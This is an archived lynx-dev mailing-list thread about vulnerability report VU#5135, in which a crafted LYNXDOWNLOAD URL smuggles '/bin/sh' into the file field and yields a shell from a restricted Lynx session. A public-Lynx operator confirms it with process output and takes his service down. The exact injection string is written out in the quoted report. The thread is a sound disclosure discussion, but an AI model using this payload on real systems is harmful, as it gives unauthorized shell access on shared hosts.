Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)

[H E Nelson]

> subscribed to the raven list :)  So, here it is in case nobody's seen
> it yet.
> 
> Duncan Hill

Good work, Duncan!

> When you start up a lynx client session, you can hit "g" (for Goto) and
> then enter the following URL:
> 
>       URL to open: 
> LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
>       Enter a filename: /dev/null
>       File exists. Overwrite? (y/n) y
> 
> This then gives a shell on the client machine on which the lynx process is
> executing.

On my pubLynx, it does appear that a shell was created.  Not only that, I
found that by using certain control keys (the terminal was initially locked
to regular keys), I could create any number of shells after that.  Who
knows how it could be exploited.

# ps -aux | grep lynx | grep -v grep
lynx      2493  0.0  3.3 3508 2868 pts/0    S 22:33:26  0:00 /usr/local/bin/lyn
lynx      2498  0.0  0.8  844  644 pts/0    S 22:34:51  0:00 sh -c /usr/bin/cp
lynx      2500  0.0  1.0 1168  856 pts/0    S 22:34:52  0:00 /bin/sh
lynx      2545  0.0  1.2 1300  972 pts/0    S 22:56:00  0:00 /bin/csh


> We would be interested in knowing whether this is a known problem.  The
> reporter suggested that disabling downloads would be an appropriate
> workaround.  If you are in agreement with this, is this a feature that is
> enabled by default?  (This would require the captive session to be started
> using the "-restrictions=download" option, wouldn't it?)

The "-restrictions=download" command line switch did not seem to prevent
someone from getting a shell on my setup.  I'll do more experimenting on
a machine not connected to the Net.

Needless to say, pubLynx is down until this problem is solved.  Sorry, folks.

__Henry
;
; To UNSUBSCRIBE:  Send a mail message to address@hidden
;                  with "unsubscribe lynx-dev" (without the
;                  quotation marks) on a line by itself.
;